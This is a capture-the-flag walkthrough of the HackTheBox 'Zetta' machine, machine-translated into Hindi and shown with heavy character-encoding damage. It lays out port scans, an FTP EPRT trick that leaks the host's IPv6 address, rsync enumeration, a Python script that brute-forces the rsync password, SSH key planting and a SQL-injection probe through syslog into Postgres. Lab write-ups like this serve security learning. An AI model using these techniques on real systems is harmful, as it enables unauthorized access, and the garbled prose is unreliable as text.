Get best of the week

рд╣реИрдХ рдж рдмреЙрдХреНрд╕ - рдЬрд╝реЗрдЯрд╛ рд╡реЙрдХрдереНрд░реВ FXP, IPv6, rsync, Postgres рдФрд░ SQLi

рдЫрд╡рд┐

рдореИрдВ HackTheBox рд╕рд╛рдЗрдЯ рд╕реЗ рдЖрдЧреЗ рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рднреЗрдЬреЗ рдЧрдП рд╕рдорд╛рдзрд╛рди рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд░рдирд╛ рдЬрд╛рд░реА рд░рдЦрддрд╛ рд╣реВрдВ ред рдореБрдЭреЗ рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдЗрд╕рд╕реЗ рдХрдо рд╕реЗ рдХрдо рдХрд┐рд╕реА рдХреЛ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдиреЗ рдореЗрдВ рдорджрдж рдорд┐рд▓реЗрдЧреАред рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо FXP рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рд░реНрд╡рд░ рдХрд╛ IPv6 рдкрддрд╛ рд╕реАрдЦрддреЗ рд╣реИрдВ, rsync рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВ, рдФрд░ рдкреЛрд╕реНрдЯрдЧреНрд░реЗрдЬ рдореЗрдВ рд▓реЙрдЧрд┐рдВрдЧ рдХрд░рддреЗ рд╕рдордп SQL рдЗрдВрдЬреЗрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП ssh рдХреБрдВрдЬреА рднреА рд▓рд┐рдЦрддреЗ рд╣реИрдВред

рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдХрд╛ рдХрдиреЗрдХреНрд╢рди рд╡реАрдкреАрдПрди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реИред рдпрд╣ рд╕рд▓рд╛рд╣ рджреА рдЬрд╛рддреА рд╣реИ рдХрд┐ рдХрд┐рд╕реА рдХрд╛рд░реНрдп рдХрдВрдкреНрдпреВрдЯрд░ рд╕реЗ рдпрд╛ рдХрд┐рд╕реА рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рди рдХрд░реЗрдВ рдЬрд╣рд╛рдВ рдЖрдкрдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдбреЗрдЯрд╛ рдЙрдкрд▓рдмреНрдз рд╣реИ, рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рдирд┐рдЬреА рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд╕рд╛рде рд╕рдорд╛рдкреНрдд рд╣реЛрддреЗ рд╣реИрдВ рдЬреЛ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдЬрд╛рдирддреЗ рд╣реИрдВ :)

рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реА
рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЬреЛ рд╕реВрдЪрдирд╛ рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХрд┐рд╕реА рднреА рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдирдпрд╛ рд╕реАрдЦрдирд╛ рдФрд░ рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдореИрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╢реНрд░реЗрдгрд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд▓рд┐рдЦреВрдВрдЧрд╛ рдФрд░ рдмрд╛рдд рдХрд░реВрдВрдЧрд╛:

  • PWN;
  • (Crypto);
  • c (Network);
  • (Reverse Engineering);
  • (Stegano);
  • WEB-.

, , , .

, , Telegram . , , .

. , - , .

рдЯреЛрд╣


рдЗрд╕ рдорд╢реАрди рдХрд╛ рдЖрдИрдкреА рдПрдбреНрд░реЗрд╕ 10.10.10.156 рд╣реИ, рдЬрд┐рд╕реЗ рдореИрдВ / etc / рдореЗрдЬрдмрд╛рдиреЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реВрдБред

10.10.10.156    zetta.htb

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдо рдЦреБрд▓реЗ рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред рдЪреВрдВрдХрд┐ рдиреИрдореНрдк рдХреЗ рд╕рд╛рде рд╕рднреА рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдореЗрдВ рд▓рдВрдмрд╛ рд╕рдордп рд▓рдЧрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдореИрдВ рдЗрд╕реЗ рдкрд╣рд▓реЗ рдореИрд╕рдХреИрди рдХреЗ рд╕рд╛рде рдХрд░реВрдВрдЧрд╛ред рд╣рдо рдкреНрд░рддрд┐ рд╕реЗрдХрдВрдб 500 рдкреИрдХреЗрдЯ рдХреА рдЧрддрд┐ рд╕реЗ tun0 рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рд╕реЗ рд╕рднреА рдЯреАрд╕реАрдкреА рдФрд░ рдпреВрдбреАрдкреА рдкреЛрд░реНрдЯ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.156 --rate=500

рдЫрд╡рд┐

рдЕрдЧрд▓рд╛, рдЖрдкрдХреЛ рдЬреНрдЮрд╛рдд рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдП-рд╡рд┐рдХрд▓реНрдк рдХреЗ рд╕рд╛рде рдиреИрдореНрдк рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред

nmap -A zetta.htb -p21,22,80

рдЫрд╡рд┐

рдПрдХ рдирдЬрд░ рдбрд╛рд▓рд┐рдП рдХрд┐ ftp рдкрд░ рдХреНрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рдирддреАрдЬрддрди, рдмреИрдирд░ рдХрд╣рддрд╛ рд╣реИ рдХрд┐ рд╣рдо IPv6 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдкрд░ рдХреНрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рд╣рдо рдПрдлрдПрдХреНрд╕рдкреА рдХреЗ рд╕рдорд░реНрдерди рдХреЗ рд╕рд╛рде рдореВрд▓ рдПрдлрд╝рдЯреАрдкреА рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░рддреЗ рд╣реИрдВред рдПрдлрдПрдХреНрд╕рдкреА рджреЛ рдПрдлрд╝рдЯреАрдкреА рд╕рд░реНрд╡рд░реЛрдВ рдХреЗ рдмреАрдЪ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рд╕реАрдзреЗ рдЖрдкрдХреЗ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдП рдмрд┐рдирд╛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдиреЗ рдХрд╛ рдПрдХ рддрд░реАрдХрд╛ рд╣реИред рдПрдХ рдПрдлрдПрдХреНрд╕рдкреА рд╕рддреНрд░ рдХреЗ рджреМрд░рд╛рди, рдХреНрд▓рд╛рдЗрдВрдЯ рджреЛ рдЕрд▓рдЧ-рдЕрд▓рдЧ рд╕рд░реНрд╡рд░реЛрдВ рдХреЗ рд▓рд┐рдП рджреЛ рдПрдлрд╝рдЯреАрдкреА рдХрдиреЗрдХреНрд╢рди рдЦреЛрд▓рддрд╛ рд╣реИ, рдкрд╣рд▓реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рддрд╛ рд╣реИ, рдкреЛрд░реНрдЯ рдХрдорд╛рдВрдб рдореЗрдВ рджреВрд╕рд░реЗ рд╕рд░реНрд╡рд░ рдХрд╛ рдЖрдИрдкреА рдкрддрд╛ рджрд░реНрд╢рд╛рддрд╛ рд╣реИред

рдЫрд╡рд┐

рдереЛрдбрд╝рд╛ рд╕реНрдХреНрд░реЙрд▓ рдХрд░рддреЗ рд╣реБрдП, рд╣рдо рдПрдлрд╝рдЯреАрдкреА рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкрд╛рддреЗ рд╣реИрдВред рдФрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдореЗрдВ рдкреНрд░рд╡реЗрд╢ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рдмрддрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рдПрдлрдПрдХреНрд╕рдкреА рдХреЗ рд▓рд┐рдП рд╕рдорд░реНрдерди рд╣реИред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдпрд╛ рддреЛ рд╕рд░реНрд╡рд░ рдкрд░ рдХреЛрдИ рдлрд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИ, рдпрд╛ рд╡реЗ рд╣рдореЗрдВ рдирд╣реАрдВ рджреА рдЧрдИ рд╣реИрдВред рд▓реЗрдХрд┐рди рдЬрдм рд╕реЗ рдпрд╣ рд╕рд░реНрд╡рд░ рдПрдлрдПрдХреНрд╕рдкреА рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИ, рд╣рдо рдПрдХ рдФрд░ рд╕рд░реНрд╡рд░ рд╣реЛрдиреЗ рдХрд╛ рджрд┐рдЦрд╛рд╡рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд▓рдХреНрд╖реНрдп рд╕рд░реНрд╡рд░ рдиреЗ рдПрдХ рдХрдиреЗрдХреНрд╢рди рд╢реБрд░реВ рдХрд┐рдпрд╛ред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдо RFC 2428 рдХреЗ рдЕрдиреБрд╕рд╛рд░ рдЗрд╕рдХрд╛ IPv6 рдкрддрд╛ рдкреНрд░рдХрдЯ рдХрд░реЗрдВрдЧреЗред

рдЫрд╡рд┐

рдЫрд╡рд┐

рдпрд╣ рдЖрдЧреЗ рдХреА рд╕реНрдХреИрдирд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╣реЛрд╕реНрдЯ рдореЗрдВ рдРрд╕реА рд╕реЗрд╡рд╛рдПрдБ рд╣реЛ рд╕рдХрддреА рд╣реИрдВ рдЬреЛ рдХреЗрд╡рд▓ IPv6 рдХрдиреЗрдХреНрд╢рди рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рддреА рд╣реИрдВред рдЗрд╕рд▓рд┐рдП рд╣рдореЗрдВ рдЕрдкрдирд╛ рдкрддрд╛ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ред

рдЫрд╡рд┐

Tcpdump рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рд╣рдо рдЙрд╕ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдЯреНрд░реИрдХ рдХрд░реЗрдВрдЧреЗ рдЬреЛ 4321 рдкреЛрд░реНрдЯ рдкрд░ рдЬрд╛рддрд╛ рд╣реИред

рдЫрд╡рд┐

рдФрд░ netcat рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣рдо ftp рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛрддреЗ рд╣реИрдВ рдФрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреЗ рд╣реИрдВред

nc zetta.htb 21

рдЫрд╡рд┐

рдФрд░ рдЕрдм рд╣рдо EPRT рдЕрдиреБрд░реЛрдз рднреЗрдЬрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдФрд░ рд╣рдо рд▓рдХреНрд╖реНрдп рд╣реЛрд╕реНрдЯ рдХреЗ IPv6 рдкрддреЗ рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЕрдм рдЗрд╕реЗ IPv4 рдХреЗ рдмрдЬрд╛рдп / etc / рдореЗрдЬрдмрд╛рди рдкрд░ рд▓рд┐рдЦреЗрдВ рдФрд░ n6 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рднреА рдкреЛрд░реНрдЯреНрд╕ рдХреЛ рд╕реНрдХреИрди рдХрд░реЗрдВ, -6 рд╡рд┐рдХрд▓реНрдк рдЬреЛрдбрд╝реЗрдВред

nmap -6 zetta.htb -p-

рдЫрд╡рд┐

рдЕрдм рд╣рдо -рдП рд╡рд┐рдХрд▓реНрдк рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВред

nmap -A -6 zetta.htb -p21,22,80,8730

рдЫрд╡рд┐

рдкреНрд░рд╡реЗрд╢ рдмрд┐рдВрджреБ


Rsync (рд░рд┐рдореЛрдЯ рд╕рд┐рдВрдХреНрд░реЛрдирд╛рдЗрдЬрд╝реЗрд╢рди) UNIX рдЬреИрд╕реА рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдПрдХ рдкреНрд░реЛрдЧреНрд░рд╛рдо рд╣реИ рдЬреЛ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдХрдо рдХрд░рддреЗ рд╣реБрдП рджреЛ рд╕реНрдерд╛рдиреЛрдВ рдкрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рдФрд░ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рдХреЛ рд╕рд┐рдВрдХреНрд░рдирд╛рдЗрдЬрд╝ рдХрд░рддрд╛ рд╣реИред Rsync рдПрдХ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдХреЙрдкреА рдпрд╛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдкреНрд░рддрд┐рд▓рд┐рдкрд┐ рдмрдирд╛ рд╕рдХрддрд╛ рд╣реИ, рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ рд╕рдВрдкреАрдбрд╝рди рдФрд░ рдкреБрдирд░рд╛рд╡реГрддреНрддрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИред rsync рдХреЗрд╡рд▓ рдлрд╝рд╛рдЗрд▓ рдкрд░рд┐рд╡рд░реНрддрдиреЛрдВ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдХреЗ рдкреНрд░рджрд░реНрд╢рди рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рддрд╛ рд╣реИред рдЖрдЗрдП рджреЗрдЦрддреЗ рд╣реИрдВ рдореЙрдбреНрдпреВрд▓ рдХреА рд╕реВрдЪреАред

rsync -6 --list-only rsync://zetta.htb:8730/

рдЫрд╡рд┐

рдЗрд╕ рд╕реВрдЪреА рд╕реЗ рдХреБрдЫ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдПрдБ рдЧрд╛рдпрдм рд╣реИрдВред рд▓реЗрдХрд┐рди рдЖрджрд┐ рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдЙрдкрд▓рдмреНрдз рдереАред

rsync -6 -av rsync://zetta.htb:8730/etc/rsync*

рдЫрд╡рд┐

рд╣рдо рд╕реНрдерд╛рдиреАрдп рдорд╢реАрди рдкрд░ рдЗрд╕ рдлрд╛рдЗрд▓ рдХреЗ рд▓рд┐рдП, rsyncd.conf рдкрдврд╝рддреЗ рд╣реИрдВред

rsync -6 -a rsync://zetta.htb:8730/etc/rsyncd.conf .

рдЫрд╡рд┐

рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдореЗрдВ рдПрдХ рдЫрд┐рдкрд╛ рд╣реБрдЖ рдореЙрдбреНрдпреВрд▓ рд╣реИ - home_roy, рдЬреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╣реЛрдо рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рд░реЙрдп рдХреЛ рдЗрдВрдЧрд┐рдд рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдпрд╣ rsyncd.secrets рд╕реЗ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдЙрдкрд▓рдмреНрдз рдирд╣реАрдВ рд╣реИред

rsync -6 rsync://zetta.htb:8730/home_roy/

рдЫрд╡рд┐

рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛


рдЬрдм рдЕрдзрд┐рдХ рд╡рд┐рдЪрд╛рд░ рдирд╣реАрдВ рдереЗ, рддреЛ рдореБрдЭреЗ рдкрд╛рд╕рд╡рд░реНрдб рдЫрд╛рдБрдЯрдирд╛ рдкрдбрд╝рд╛ред рдЗрд╕рдХреЗ рд▓рд┐рдП, рдкрд╛рдпрдерди рдХреЛрдб рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рдерд╛ рдФрд░ Seclists рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреА рдПрдХ рд╕реВрдЪреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред

#!/usr/bin/python3

def clear():
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")

from pwn import *

with open("/usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt", "r") as f:
    passwords = f.read().split('\n')

for password in passwords:
    s = process(["rsync", "-6", "rsync://roy@zetta.htb:8730/home_roy"], env={"RSYNC_PASSWORD":password})
    clear()
    clear()
    print(("password: " + password).ljust(30, " "), end="\r\r")
    
    s.recvuntil("\"Cloud sync\".\n\n\n")
    if b"@ERROR:" not in s.recv():
        print("found!!!")
        break
    s.close()
clear()

рдЫрд╡рд┐

рдЕрдм рдЬрдм рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдЬрд╛рдирддреЗ рд╣реИрдВ, рддреЛ ssh рдХреБрдВрдЬреА рдЬреЗрдирд░реЗрдЯ рдХрд░реЗрдВ рдФрд░ рдЗрд╕реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВред

рдЫрд╡рд┐

рдЫрд╡рд┐

рдЫрд╡рд┐

рдФрд░ рдЗрд╕ рдХреБрдВрдЬреА рдХреЗ рд╕рд╛рде SSH рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рддреЗ рд╣реБрдП, рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЯреЛрдХрди рд▓реЗрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЬрдбрд╝


рдЯреЛрдХрди рдХреЗ рдЖрдЧреЗ рдПрдХ рд╕рдВрдХреЗрдд рд╣реИ - рдХрд╛рд░реНрдпреЛрдВ рдХреА рдПрдХ рд╕реВрдЪреАред

рдЫрд╡рд┐

рдЪрд▓реЛ рдЙрдиреНрд╣реЗрдВ рдЦреЛрд▓рддреЗ рд╣реИрдВред

todo .tudu.xml

рдЫрд╡рд┐

рдЖрдЗрдП рд╕рднреА рдирд┐рдпреЛрдЬрд┐рдд рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рджреЗрдЦреЗрдВред рд╕рд░реНрд╡рд░ git рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред

рдЫрд╡рд┐

рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рд╕рд╣реЗрдЬреЗ рдЬрд╛рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдХреА рднреА рдпреЛрдЬрдирд╛ рд╣реИ, рдЬреЛ рдЗрд╕ рд╕рдордп рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рдкреНрд░рдХрд╛рд░ рдХреА рджрд┐рдЦрддреА рд╣реИред

рдЫрд╡рд┐

рдкрд╣рд▓реА рдЪреАрдЬ рдЬреЛ рд╣рдо рдХрд░рддреЗ рд╣реИрдВ, рд╡рд╣ рд╕рдордЭ рдореЗрдВ рдЖрддреА рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╡рд╣рд╛рдВ рд╣рдо рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкрд░рд┐рд╡рд░реНрддрди рдХрд╛ рдЗрддрд┐рд╣рд╛рд╕ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рд╕рд░реНрд╡рд░ рдкрд░ рд╕рднреА .IT рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЦреЛрдЬреЗрдВред

рдЫрд╡рд┐

рд╣рдо rsyslog рдЬрд░реНрдирд▓ рдореЗрдВ рд╕рдмрд╕реЗ рдЕрдзрд┐рдХ рд░реБрдЪрд┐ рд░рдЦрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдореИрдВ рдЗрд╕рдХреА рд╕рдВрдкреВрд░реНрдг рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдХреЛ рд╕реНрдерд╛рдиреАрдп рдорд╢реАрди рдореЗрдВ рдХреЙрдкреА рдХрд░рддрд╛ рд╣реВрдВред

рдЫрд╡рд┐

рдЕрдм рд╣рдо рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдореЗрдВ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рд▓реЛрдб рдХрд┐рдП рдЧрдП рдФрд░ gitk рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ (рдЧреНрд░рд╛рдлрд┐рдХрд▓ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдПрдХ рдЯреНрд░рд┐рдлрд╝рд▓ рд╣реИ, рд▓реЗрдХрд┐рди рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рд╣реИ)ред

рдЫрд╡рд┐

рд╣рдо рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рджреЗрдЦрддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдЕрдЧрд░ рд╣рдо рдЙрдирдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╣рдо рдЕрд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВред рд╕рд╛рде рд╣реА рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдореЗрдВ рдЖрдк рдЙрд╕ рдЯреЗрдореНрдкреНрд▓реЗрдЯ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХреЗ рдЕрдиреБрд╕рд╛рд░ рд▓реЙрдЧ рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рд░рдЦреЗ рдЧрдП рд╣реИрдВред рд▓реЙрдЧ рдХреЛ /var/log/postgresql/postgresql-11-main.log рд▓реЙрдЧ рдореЗрдВ рд╕рд╣реЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рдХрд┐ рд╣рдо рдЬрд┐рд╕ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдп рд╣реИрдВ, рдЙрд╕рдХреЗ рд▓рд┐рдП рд╕реБрд▓рдн рд╣реИред

рдЫрд╡рд┐

рдЪреВрдВрдХрд┐ рд╣рдо рдПрдХ рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рдЖрдк рдЗрдВрдЬреЗрдХреНрд╢рди рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рд╣рдо рд▓реЙрдЧрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рд┐рдХреЙрд░реНрдбрд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдШрдЯрдирд╛рдУрдВ рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░реЗрдВрдЧреЗ, рд╕рд╛рде рд╣реА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рд╕рдордп рдореЗрдВ рдирд┐рдЧрд░рд╛рдиреА рдХрд░реЗрдВрдЧреЗ рдХрд┐ рд▓реЙрдЧ рдореЗрдВ рдХреНрдпрд╛ рдорд┐рд▓рддрд╛ рд╣реИ (рд╕реБрд╡рд┐рдзрд╛ рдХреЗ рд▓рд┐рдП, рдЖрдк рдШрдбрд╝реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╡рд┐рднрд╛рдЬрд┐рдд рд╡рд┐рдВрдбреЛ рдХреЗ рд╕рд╛рде qterminal рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ)ред

watch -n 1 cat postgresql-11-main.log

рдФрд░ рдШрдЯрдирд╛ рдХреЛ рднреЗрдЬреЗрдВред

logger -p local7.info "'"

рдЫрд╡рд┐

рдФрд░ рдПрдХ рддреНрд░реБрдЯрд┐ рд╣реЛрддреА рд╣реИ рдЬреЛ рдПрдХ рд╕рдВрднрд╛рд╡рд┐рдд рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЛ рдЗрдВрдЧрд┐рдд рдХрд░рддреА рд╣реИред / Etc / passwd рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдП, рд╣рдореЗрдВ рдкрддрд╛ рдЪрд▓рддрд╛ рд╣реИ рдХрд┐ рдкреЛрд╕реНрдЯрдЧреНрд░реИрдЬ рд╕реЗрд╡рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕ / bin / bash рд╢реЗрд▓ рд╣реИред

рдЫрд╡рд┐

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдо ssh рдХреЗ рджреНрд╡рд╛рд░рд╛ рд▓реЙрдЧрд┐рди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рд╣рдореЗрдВ рдХрдорд╛рдВрдб рдЗрддрд┐рд╣рд╛рд╕ рд╕рд╣рд┐рдд рдкреЛрд╕реНрдЯрдЧреНрд░реЗрдЬ рдлрд╝рд╛рдЗрд▓ рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХрд░реЗрдЧрд╛ред рдпрджрд┐ рд╣рдо рдЗрдВрдЬреЗрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдлрд╝рд╛рдЗрд▓ рд▓рд┐рдЦ рд╕рдХрддреЗ рд╣реИрдВ, рддреЛ рдЬрд╛рдВрдЪреЗрдВред

